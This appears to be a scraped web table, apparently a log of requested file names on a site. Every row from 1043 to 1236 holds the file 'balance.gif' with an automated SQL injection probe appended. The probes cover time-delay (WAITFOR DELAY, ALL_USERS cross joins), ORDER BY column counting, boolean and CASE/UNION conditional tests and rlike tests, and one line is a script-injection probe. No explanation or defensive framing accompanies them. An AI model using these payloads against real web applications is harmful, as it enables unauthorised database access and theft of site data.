1043. | 1 | balance.gif //slike//stran_1;DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1044. | 1 | balance.gif //slike//stran_1');DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1045. | 1 | balance.gif //slike//stran_1'));DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1046. | 1 | balance.gif //slike//stran_1';DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1047. | 1 | balance.gif //slike//stran_1%';DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1048. | 1 | balance.gif //slike//stran_1");DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1049. | 1 | balance.gif //slike//stran_1";DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1050. | 1 | balance.gif //slike//stran_1);SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1051. | 1 | balance.gif //slike//stran_1;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1052. | 1 | balance.gif //slike//stran_1');SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1053. | 1 | balance.gif //slike//stran_1'));SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1054. | 1 | balance.gif //slike//stran_1';SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1055. | 1 | balance.gif //slike//stran_1%';SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1056. | 1 | balance.gif //slike//stran_1");SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1057. | 1 | balance.gif //slike//stran_1";SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/balance.gif |
1058. | 1 | balance.gif //slike//stran_1) ORDER BY 1-- EJYd/balance.gif |
1059. | 1 | balance.gif //slike//stran_1) ORDER BY 6483-- JLbG/balance.gif |
1060. | 1 | balance.gif //slike//stran_1)) ORDER BY 1-- TMFE/balance.gif |
1061. | 1 | balance.gif //slike//stran_1)) ORDER BY 3073-- Hxah/balance.gif |
1062. | 1 | balance.gif //slike//stran_1') ORDER BY 1-- sPAQ/balance.gif |
1063. | 1 | balance.gif //slike//stran_1') ORDER BY 3432-- xCuc/balance.gif |
1064. | 1 | balance.gif //slike//stran_1')) ORDER BY 1-- BGct/balance.gif |
1065. | 1 | balance.gif //slike//stran_1')) ORDER BY 1455-- myLu/balance.gif |
1066. | 1 | balance.gif //slike//stran_1' ORDER BY 1-- MXFU/balance.gif |
1067. | 1 | balance.gif //slike//stran_1' ORDER BY 7571-- zXhR/balance.gif |
1068. | 1 | balance.gif //slike//stran_1') ORDER BY 1-- tizJ/balance.gif |
1069. | 1 | balance.gif //slike//stran_1') ORDER BY 8483-- jPgy/balance.gif |
1070. | 1 | balance.gif //slike//stran_1%' ORDER BY 1-- Cpsp/balance.gif |
1071. | 1 | balance.gif //slike//stran_1%' ORDER BY 3876-- SKBj/balance.gif |
1072. | 1 | balance.gif //slike//stran_1' ORDER BY 1-- AoXz/balance.gif |
1073. | 1 | balance.gif //slike//stran_1' ORDER BY 4039-- NULB/balance.gif |
1074. | 1 | balance.gif //slike//stran_1") ORDER BY 1-- Upfn/balance.gif |
1075. | 1 | balance.gif //slike//stran_1") ORDER BY 4026-- SxsX/balance.gif |
1076. | 1 | balance.gif //slike//stran_1" ORDER BY 1-- uTsE/balance.gif |
1077. | 1 | balance.gif //slike//stran_1" ORDER BY 5528-- qmhK/balance.gif |
1078. | 1 | balance.gif //slike//stran_1) ORDER BY 1#/balance.gif |
1079. | 1 | balance.gif //slike//stran_1) ORDER BY 3134#/balance.gif |
1080. | 1 | balance.gif //slike//stran_1)) ORDER BY 1#/balance.gif |
1081. | 1 | balance.gif //slike//stran_1)) ORDER BY 2267#/balance.gif |
1082. | 1 | balance.gif //slike//stran_1 ORDER BY 2149#/balance.gif |
1083. | 1 | balance.gif //slike//stran_1 ORDER BY 9284#/balance.gif |
1084. | 1 | balance.gif //slike//stran_1') ORDER BY 7365#/balance.gif |
1085. | 1 | balance.gif //slike//stran_1')) ORDER BY 1#/balance.gif |
1086. | 1 | balance.gif //slike//stran_1')) ORDER BY 6229#/balance.gif |
1087. | 1 | balance.gif //slike//stran_1' ORDER BY 4040#/balance.gif |
1088. | 1 | balance.gif //slike//stran_1') ORDER BY 3745#/balance.gif |
1089. | 1 | balance.gif //slike//stran_1%' ORDER BY 1#/balance.gif |
1090. | 1 | balance.gif //slike//stran_1%' ORDER BY 3540#/balance.gif |
1091. | 1 | balance.gif //slike//stran_1' ORDER BY 2377#/balance.gif |
1092. | 1 | balance.gif //slike//stran_1") ORDER BY 1#/balance.gif |
1093. | 1 | balance.gif //slike//stran_1") ORDER BY 2546#/balance.gif |
1094. | 1 | balance.gif //slike//stran_1" ORDER BY 1#/balance.gif |
1095. | 1 | balance.gif //slike//stran_1" ORDER BY 8759#/balance.gif |
1096. | 1 | balance.gif,,.)))"..' //slike//stran_1/balance.gif,,.)))"..' |
1097. | 1 | mobftl','','scrollbars=1,resizable=1');">balance.gif'kbijjz<'">mobftl //slike//stran_1/balance.gif'kbijjz<'">mobftl |
1098. | 1 | balance.gif) and 9487=7548 and (1549=1549 //slike//stran_1/balance.gif) and 9487=7548 and (1549=1549 |
1099. | 1 | balance.gif) and 6368=6368 and (5971=5971 //slike//stran_1/balance.gif) and 6368=6368 and (5971=5971 |
1100. | 1 | balance.gif)) and 1380=9374 and ((5514=5514 //slike//stran_1/balance.gif)) and 1380=9374 and ((5514=5514 |
1101. | 1 | balance.gif)) and 6368=6368 and ((2443=2443 //slike//stran_1/balance.gif)) and 6368=6368 and ((2443=2443 |
1102. | 1 | balance.gif and 4517=7938 //slike//stran_1/balance.gif and 4517=7938 |
1103. | 1 | balance.gif and 6368=6368 //slike//stran_1/balance.gif and 6368=6368 |
1104. | 1 | balance.gif') and 2108=5815 and ('ummp'='ummp //slike//stran_1/balance.gif') and 2108=5815 and ('ummp'='ummp |
1105. | 1 | balance.gif') and 6368=6368 and ('hwme'='hwme //slike//stran_1/balance.gif') and 6368=6368 and ('hwme'='hwme |
1106. | 1 | balance.gif')) and 6915=1132 and (('pedk'='pedk //slike//stran_1/balance.gif')) and 6915=1132 and (('pedk'='pedk |
1107. | 1 | balance.gif')) and 6368=6368 and (('skjd'='skjd //slike//stran_1/balance.gif')) and 6368=6368 and (('skjd'='skjd |
1108. | 1 | balance.gif' and 6258=2895 and 'kjjn'='kjjn //slike//stran_1/balance.gif' and 6258=2895 and 'kjjn'='kjjn |
1109. | 1 | balance.gif' and 6368=6368 and 'bgca'='bgca //slike//stran_1/balance.gif' and 6368=6368 and 'bgca'='bgca |
1110. | 1 | balance.gif') and 7297=7652 and ('etvf' like 'etvf //slike//stran_1/balance.gif') and 7297=7652 and ('etvf' like 'etvf |
1111. | 1 | balance.gif') and 6368=6368 and ('zblq' like 'zblq //slike//stran_1/balance.gif') and 6368=6368 and ('zblq' like 'zblq |
1112. | 1 | balance.gif%' and 7287=3168 and 'hlza%'='hlza //slike//stran_1/balance.gif%' and 7287=3168 and 'hlza%'='hlza |
1113. | 1 | balance.gif%' and 6368=6368 and 'ogur%'='ogur //slike//stran_1/balance.gif%' and 6368=6368 and 'ogur%'='ogur |
1114. | 1 | balance.gif' and 4789=1115 and 'sbvk' like 'sbvk //slike//stran_1/balance.gif' and 4789=1115 and 'sbvk' like 'sbvk |
1115. | 1 | balance.gif' and 6368=6368 and 'ggeg' like 'ggeg //slike//stran_1/balance.gif' and 6368=6368 and 'ggeg' like 'ggeg |
1116. | 1 | balance.gif") and 4566=6688 and ("lgdn"="lgdn //slike//stran_1/balance.gif") and 4566=6688 and ("lgdn"="lgdn |
1117. | 1 | balance.gif") and 6368=6368 and ("mwsm"="mwsm //slike//stran_1/balance.gif") and 6368=6368 and ("mwsm"="mwsm |
1118. | 1 | balance.gif" and 7189=7598 and "epzq"="epzq //slike//stran_1/balance.gif" and 7189=7598 and "epzq"="epzq |
1119. | 1 | balance.gif" and 6368=6368 and "kilv"="kilv //slike//stran_1/balance.gif" and 6368=6368 and "kilv"="kilv |
1120. | 1 | balance.gif and 7606=9859-- niel //slike//stran_1/balance.gif and 7606=9859-- niel |
1121. | 1 | balance.gif and 6368=6368-- yvac //slike//stran_1/balance.gif and 6368=6368-- yvac |
1122. | 1 | -3314) or 1138=7968 and (4593=4593 //slike//stran_1/-3314) or 1138=7968 and (4593=4593 |
1123. | 1 | -9234) or 3085=3085 and (6825=6825 //slike//stran_1/-9234) or 3085=3085 and (6825=6825 |
1124. | 1 | -4720)) or 9092=1680 and ((9034=9034 //slike//stran_1/-4720)) or 9092=1680 and ((9034=9034 |
1125. | 1 | -5109)) or 3085=3085 and ((6599=6599 //slike//stran_1/-5109)) or 3085=3085 and ((6599=6599 |
1126. | 1 | -1794 or 2654=2923 //slike//stran_1/-1794 or 2654=2923 |
1127. | 1 | -1538 or 3085=3085 //slike//stran_1/-1538 or 3085=3085 |
1128. | 1 | -8867') or 7344=1652 and ('qxxi'='qxxi //slike//stran_1/-8867') or 7344=1652 and ('qxxi'='qxxi |
1129. | 1 | -9480') or 3085=3085 and ('dpdj'='dpdj //slike//stran_1/-9480') or 3085=3085 and ('dpdj'='dpdj |
1130. | 1 | -4705')) or 4419=5604 and (('msjk'='msjk //slike//stran_1/-4705')) or 4419=5604 and (('msjk'='msjk |
1131. | 1 | -4353')) or 3085=3085 and (('ovxs'='ovxs //slike//stran_1/-4353')) or 3085=3085 and (('ovxs'='ovxs |
1132. | 1 | -6126' or 5251=7834 and 'ksrc'='ksrc //slike//stran_1/-6126' or 5251=7834 and 'ksrc'='ksrc |
1133. | 1 | -6896' or 3085=3085 and 'vukw'='vukw //slike//stran_1/-6896' or 3085=3085 and 'vukw'='vukw |
1134. | 1 | -4394') or 9701=9381 and ('xebd' like 'xebd //slike//stran_1/-4394') or 9701=9381 and ('xebd' like 'xebd |
1135. | 1 | -5574') or 3085=3085 and ('szqt' like 'szqt //slike//stran_1/-5574') or 3085=3085 and ('szqt' like 'szqt |
1136. | 1 | -7960%' or 2727=9337 and 'bxym%'='bxym //slike//stran_1/-7960%' or 2727=9337 and 'bxym%'='bxym |
1137. | 1 | -7147%' or 3085=3085 and 'qgne%'='qgne //slike//stran_1/-7147%' or 3085=3085 and 'qgne%'='qgne |
1138. | 1 | -6445' or 3233=9927 and 'qvym' like 'qvym //slike//stran_1/-6445' or 3233=9927 and 'qvym' like 'qvym |
1139. | 1 | -3763' or 3085=3085 and 'jjim' like 'jjim //slike//stran_1/-3763' or 3085=3085 and 'jjim' like 'jjim |
1140. | 1 | -5572") or 3870=7714 and ("bhrw"="bhrw //slike//stran_1/-5572") or 3870=7714 and ("bhrw"="bhrw |
1141. | 1 | -9734") or 3085=3085 and ("bour"="bour //slike//stran_1/-9734") or 3085=3085 and ("bour"="bour |
1142. | 1 | -9740" or 1481=4610 and "fgyy"="fgyy //slike//stran_1/-9740" or 1481=4610 and "fgyy"="fgyy |
1143. | 1 | -7823" or 3085=3085 and "diif"="diif //slike//stran_1/-7823" or 3085=3085 and "diif"="diif |
1144. | 1 | -2046 or 4970=7377-- mnai //slike//stran_1/-2046 or 4970=7377-- mnai |
1145. | 1 | -1043 or 3085=3085-- ykpj //slike//stran_1/-1043 or 3085=3085-- ykpj |
1146. | 1 | balance.gif) and 3992=(select (case when (3992=8651) then 3992 else (select 8651 union select 4968) end))-- euze //slike//stran_1/balance.gif) and 3992=(select (case when (3992=8651) then 3992 else (select 8651 union select 4968) end))-- euze |
1147. | 1 | balance.gif) and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- prqt //slike//stran_1/balance.gif) and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- prqt |
1148. | 1 | balance.gif)) and 4769=(select (case when (4769=7830) then 4769 else (select 7830 union select 6841) end))-- osys //slike//stran_1/balance.gif)) and 4769=(select (case when (4769=7830) then 4769 else (select 7830 union select 6841) end))-- osys |
1149. | 1 | balance.gif)) and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- drpi //slike//stran_1/balance.gif)) and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- drpi |
1150. | 1 | balance.gif and 6718=(select (case when (6718=3273) then 6718 else (select 3273 union select 7486) end))-- mcso //slike//stran_1/balance.gif and 6718=(select (case when (6718=3273) then 6718 else (select 3273 union select 7486) end))-- mcso |
1151. | 1 | balance.gif and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- lzoj //slike//stran_1/balance.gif and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- lzoj |
1152. | 1 | balance.gif') and 7578=(select (case when (7578=3567) then 7578 else (select 3567 union select 3739) end))-- reso //slike//stran_1/balance.gif') and 7578=(select (case when (7578=3567) then 7578 else (select 3567 union select 3739) end))-- reso |
1153. | 1 | balance.gif') and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- bqpp //slike//stran_1/balance.gif') and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- bqpp |
1154. | 1 | balance.gif')) and 1854=(select (case when (1854=5836) then 1854 else (select 5836 union select 9447) end))-- rujy //slike//stran_1/balance.gif')) and 1854=(select (case when (1854=5836) then 1854 else (select 5836 union select 9447) end))-- rujy |
1155. | 1 | balance.gif')) and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- cjoo //slike//stran_1/balance.gif')) and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- cjoo |
1156. | 1 | balance.gif' and 6964=(select (case when (6964=9991) then 6964 else (select 9991 union select 6112) end))-- ebtp //slike//stran_1/balance.gif' and 6964=(select (case when (6964=9991) then 6964 else (select 9991 union select 6112) end))-- ebtp |
1157. | 1 | balance.gif' and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- kysr //slike//stran_1/balance.gif' and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- kysr |
1158. | 1 | balance.gif%' and 7521=(select (case when (7521=2903) then 7521 else (select 2903 union select 6041) end))-- yorr //slike//stran_1/balance.gif%' and 7521=(select (case when (7521=2903) then 7521 else (select 2903 union select 6041) end))-- yorr |
1159. | 1 | balance.gif%' and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- nxxz //slike//stran_1/balance.gif%' and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- nxxz |
1160. | 1 | balance.gif") and 5295=(select (case when (5295=2953) then 5295 else (select 2953 union select 1525) end))-- tqwa //slike//stran_1/balance.gif") and 5295=(select (case when (5295=2953) then 5295 else (select 2953 union select 1525) end))-- tqwa |
1161. | 1 | balance.gif") and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- tqir //slike//stran_1/balance.gif") and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- tqir |
1162. | 1 | balance.gif" and 2779=(select (case when (2779=3435) then 2779 else (select 3435 union select 5895) end))-- pyvd //slike//stran_1/balance.gif" and 2779=(select (case when (2779=3435) then 2779 else (select 3435 union select 5895) end))-- pyvd |
1163. | 1 | balance.gif" and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- lost //slike//stran_1/balance.gif" and 8589=(select (case when (8589=8589) then 8589 else (select 5053 union select 7369) end))-- lost |
1164. | 1 | -4399) or 1331=(select (case when (1331=3031) then 1331 else (select 3031 union select 5888) end))-- hlxu //slike//stran_1/-4399) or 1331=(select (case when (1331=3031) then 1331 else (select 3031 union select 5888) end))-- hlxu |
1165. | 1 | -3331) or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- omcu //slike//stran_1/-3331) or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- omcu |
1166. | 1 | -2791)) or 5070=(select (case when (5070=8222) then 5070 else (select 8222 union select 5745) end))-- eove //slike//stran_1/-2791)) or 5070=(select (case when (5070=8222) then 5070 else (select 8222 union select 5745) end))-- eove |
1167. | 1 | -1688)) or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- slfq //slike//stran_1/-1688)) or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- slfq |
1168. | 1 | -4895 or 4907=(select (case when (4907=9066) then 4907 else (select 9066 union select 5094) end))-- uyds //slike//stran_1/-4895 or 4907=(select (case when (4907=9066) then 4907 else (select 9066 union select 5094) end))-- uyds |
1169. | 1 | -3969 or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- ujvm //slike//stran_1/-3969 or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- ujvm |
1170. | 1 | -8574') or 6351=(select (case when (6351=8709) then 6351 else (select 8709 union select 7297) end))-- dhsg //slike//stran_1/-8574') or 6351=(select (case when (6351=8709) then 6351 else (select 8709 union select 7297) end))-- dhsg |
1171. | 1 | -3550') or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- pryk //slike//stran_1/-3550') or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- pryk |
1172. | 1 | -7920')) or 3898=(select (case when (3898=8783) then 3898 else (select 8783 union select 7084) end))-- nmfj //slike//stran_1/-7920')) or 3898=(select (case when (3898=8783) then 3898 else (select 8783 union select 7084) end))-- nmfj |
1173. | 1 | -7793')) or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- svvv //slike//stran_1/-7793')) or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- svvv |
1174. | 1 | -6535' or 5755=(select (case when (5755=1508) then 5755 else (select 1508 union select 6432) end))-- mjtm //slike//stran_1/-6535' or 5755=(select (case when (5755=1508) then 5755 else (select 1508 union select 6432) end))-- mjtm |
1175. | 1 | -1694' or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- oqpp //slike//stran_1/-1694' or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- oqpp |
1176. | 1 | -8181%' or 3495=(select (case when (3495=3778) then 3495 else (select 3778 union select 1104) end))-- xeio //slike//stran_1/-8181%' or 3495=(select (case when (3495=3778) then 3495 else (select 3778 union select 1104) end))-- xeio |
1177. | 1 | -2410%' or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- iuqi //slike//stran_1/-2410%' or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- iuqi |
1178. | 1 | -8151") or 2196=(select (case when (2196=9737) then 2196 else (select 9737 union select 3075) end))-- hbbr //slike//stran_1/-8151") or 2196=(select (case when (2196=9737) then 2196 else (select 9737 union select 3075) end))-- hbbr |
1179. | 1 | -9179") or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- rjzx //slike//stran_1/-9179") or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- rjzx |
1180. | 1 | -1625" or 8302=(select (case when (8302=9855) then 8302 else (select 9855 union select 1218) end))-- ojys //slike//stran_1/-1625" or 8302=(select (case when (8302=9855) then 8302 else (select 9855 union select 1218) end))-- ojys |
1181. | 1 | -4654" or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- gkqb //slike//stran_1/-4654" or 6246=(select (case when (6246=6246) then 6246 else (select 8412 union select 4746) end))-- gkqb |
1182. | 1 | balance.gif) and 6764=2421-- oria //slike//stran_1/balance.gif) and 6764=2421-- oria |
1183. | 1 | balance.gif) and 5073=5073-- eebp //slike//stran_1/balance.gif) and 5073=5073-- eebp |
1184. | 1 | balance.gif)) and 2433=4755-- qekh //slike//stran_1/balance.gif)) and 2433=4755-- qekh |
1185. | 1 | balance.gif)) and 5073=5073-- lqdc //slike//stran_1/balance.gif)) and 5073=5073-- lqdc |
1186. | 1 | balance.gif') and 1879=9297-- mzzd //slike//stran_1/balance.gif') and 1879=9297-- mzzd |
1187. | 1 | balance.gif') and 5073=5073-- vrnp //slike//stran_1/balance.gif') and 5073=5073-- vrnp |
1188. | 1 | balance.gif')) and 8043=5860-- byzg //slike//stran_1/balance.gif')) and 8043=5860-- byzg |
1189. | 1 | balance.gif')) and 5073=5073-- aptb //slike//stran_1/balance.gif')) and 5073=5073-- aptb |
1190. | 1 | balance.gif' and 3475=6049-- cpuu //slike//stran_1/balance.gif' and 3475=6049-- cpuu |
1191. | 1 | balance.gif' and 5073=5073-- sigs //slike//stran_1/balance.gif' and 5073=5073-- sigs |
1192. | 1 | balance.gif%' and 6595=3156-- qfun //slike//stran_1/balance.gif%' and 6595=3156-- qfun |
1193. | 1 | balance.gif%' and 5073=5073-- fqve //slike//stran_1/balance.gif%' and 5073=5073-- fqve |
1194. | 1 | balance.gif") and 3074=1883-- opty //slike//stran_1/balance.gif") and 3074=1883-- opty |
1195. | 1 | balance.gif") and 5073=5073-- csmr //slike//stran_1/balance.gif") and 5073=5073-- csmr |
1196. | 1 | balance.gif" and 3243=1132-- arnf //slike//stran_1/balance.gif" and 3243=1132-- arnf |
1197. | 1 | balance.gif" and 5073=5073-- ddov //slike//stran_1/balance.gif" and 5073=5073-- ddov |
1198. | 1 | -9868) or 3879=9221-- ivlp //slike//stran_1/-9868) or 3879=9221-- ivlp |
1199. | 1 | -6159) or 8801=8801-- patv //slike//stran_1/-6159) or 8801=8801-- patv |
1200. | 1 | -1985)) or 5692=3828-- srxf //slike//stran_1/-1985)) or 5692=3828-- srxf |
1201. | 1 | -1469)) or 8801=8801-- ypss //slike//stran_1/-1469)) or 8801=8801-- ypss |
1202. | 1 | -6792') or 8848=7980-- twco //slike//stran_1/-6792') or 8848=7980-- twco |
1203. | 1 | -3063') or 8801=8801-- giih //slike//stran_1/-3063') or 8801=8801-- giih |
1204. | 1 | -8116')) or 1943=9902-- fpop //slike//stran_1/-8116')) or 1943=9902-- fpop |
1205. | 1 | -4347')) or 8801=8801-- vmkk //slike//stran_1/-4347')) or 8801=8801-- vmkk |
1206. | 1 | -6547' or 3808=8511-- mvdp //slike//stran_1/-6547' or 3808=8511-- mvdp |
1207. | 1 | -1074' or 8801=8801-- qoed //slike//stran_1/-1074' or 8801=8801-- qoed |
1208. | 1 | -4962%' or 8627=4531-- sycb //slike//stran_1/-4962%' or 8627=4531-- sycb |
1209. | 1 | -4206%' or 8801=8801-- xhlh //slike//stran_1/-4206%' or 8801=8801-- xhlh |
1210. | 1 | -7264") or 1080=4102-- jdzo //slike//stran_1/-7264") or 1080=4102-- jdzo |
1211. | 1 | -1378") or 8801=8801-- itkx //slike//stran_1/-1378") or 8801=8801-- itkx |
1212. | 1 | -9920" or 2080=4186-- yanl //slike//stran_1/-9920" or 2080=4186-- yanl |
1213. | 1 | -9325" or 8801=8801-- lgwn //slike//stran_1/-9325" or 8801=8801-- lgwn |
1214. | 1 | balance.gif) rlike (select (case when (1686=8755) then 0x62616c616e63652e676966 else 0x28 end)) and (9870=9870 //slike//stran_1/balance.gif) rlike (select (case when (1686=8755) then 0x62616c616e63652e676966 else 0x28 end)) and (9870=9870 |
1215. | 1 | balance.gif) rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and (5875=5875 //slike//stran_1/balance.gif) rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and (5875=5875 |
1216. | 1 | balance.gif)) rlike (select (case when (6309=6024) then 0x62616c616e63652e676966 else 0x28 end)) and ((7465=7465 //slike//stran_1/balance.gif)) rlike (select (case when (6309=6024) then 0x62616c616e63652e676966 else 0x28 end)) and ((7465=7465 |
1217. | 1 | balance.gif)) rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ((3508=3508 //slike//stran_1/balance.gif)) rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ((3508=3508 |
1218. | 1 | balance.gif rlike (select (case when (3633=3628) then 0x62616c616e63652e676966 else 0x28 end)) //slike//stran_1/balance.gif rlike (select (case when (3633=3628) then 0x62616c616e63652e676966 else 0x28 end)) |
1219. | 1 | balance.gif rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) //slike//stran_1/balance.gif rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) |
1220. | 1 | balance.gif') rlike (select (case when (8697=8293) then 0x62616c616e63652e676966 else 0x28 end)) and ('aujq'='aujq //slike//stran_1/balance.gif') rlike (select (case when (8697=8293) then 0x62616c616e63652e676966 else 0x28 end)) and ('aujq'='aujq |
1221. | 1 | balance.gif') rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ('ktxa'='ktxa //slike//stran_1/balance.gif') rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ('ktxa'='ktxa |
1222. | 1 | balance.gif')) rlike (select (case when (7592=3148) then 0x62616c616e63652e676966 else 0x28 end)) and (('optc'='optc //slike//stran_1/balance.gif')) rlike (select (case when (7592=3148) then 0x62616c616e63652e676966 else 0x28 end)) and (('optc'='optc |
1223. | 1 | balance.gif')) rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and (('bfli'='bfli //slike//stran_1/balance.gif')) rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and (('bfli'='bfli |
1224. | 1 | balance.gif' rlike (select (case when (7669=9162) then 0x62616c616e63652e676966 else 0x28 end)) and 'fxcb'='fxcb //slike//stran_1/balance.gif' rlike (select (case when (7669=9162) then 0x62616c616e63652e676966 else 0x28 end)) and 'fxcb'='fxcb |
1225. | 1 | balance.gif' rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and 'xrrm'='xrrm //slike//stran_1/balance.gif' rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and 'xrrm'='xrrm |
1226. | 1 | balance.gif') rlike (select (case when (1010=1292) then 0x62616c616e63652e676966 else 0x28 end)) and ('veih' like 'veih //slike//stran_1/balance.gif') rlike (select (case when (1010=1292) then 0x62616c616e63652e676966 else 0x28 end)) and ('veih' like 'veih |
1227. | 1 | balance.gif') rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ('anux' like 'anux //slike//stran_1/balance.gif') rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ('anux' like 'anux |
1228. | 1 | balance.gif%' rlike (select (case when (2198=1175) then 0x62616c616e63652e676966 else 0x28 end)) and 'azqy%'='azqy //slike//stran_1/balance.gif%' rlike (select (case when (2198=1175) then 0x62616c616e63652e676966 else 0x28 end)) and 'azqy%'='azqy |
1229. | 1 | balance.gif%' rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and 'henq%'='henq //slike//stran_1/balance.gif%' rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and 'henq%'='henq |
1230. | 1 | balance.gif' rlike (select (case when (2404=8345) then 0x62616c616e63652e676966 else 0x28 end)) and 'tpzs' like 'tpzs //slike//stran_1/balance.gif' rlike (select (case when (2404=8345) then 0x62616c616e63652e676966 else 0x28 end)) and 'tpzs' like 'tpzs |
1231. | 1 | balance.gif' rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and 'chac' like 'chac //slike//stran_1/balance.gif' rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and 'chac' like 'chac |
1232. | 1 | balance.gif") rlike (select (case when (2836=1834) then 0x62616c616e63652e676966 else 0x28 end)) and ("lcuj"="lcuj //slike//stran_1/balance.gif") rlike (select (case when (2836=1834) then 0x62616c616e63652e676966 else 0x28 end)) and ("lcuj"="lcuj |
1233. | 1 | balance.gif") rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ("zylz"="zylz //slike//stran_1/balance.gif") rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and ("zylz"="zylz |
1234. | 1 | balance.gif" rlike (select (case when (5079=9586) then 0x62616c616e63652e676966 else 0x28 end)) and "zzsq"="zzsq //slike//stran_1/balance.gif" rlike (select (case when (5079=9586) then 0x62616c616e63652e676966 else 0x28 end)) and "zzsq"="zzsq |
1235. | 1 | balance.gif" rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and "owri"="owri //slike//stran_1/balance.gif" rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end)) and "owri"="owri |
1236. | 1 | balance.gif rlike (select (case when (3952=4600) then 0x62616c616e63652e676966 else 0x28 end))-- uqyo //slike//stran_1/balance.gif rlike (select (case when (3952=4600) then 0x62616c616e63652e676966 else 0x28 end))-- uqyo |
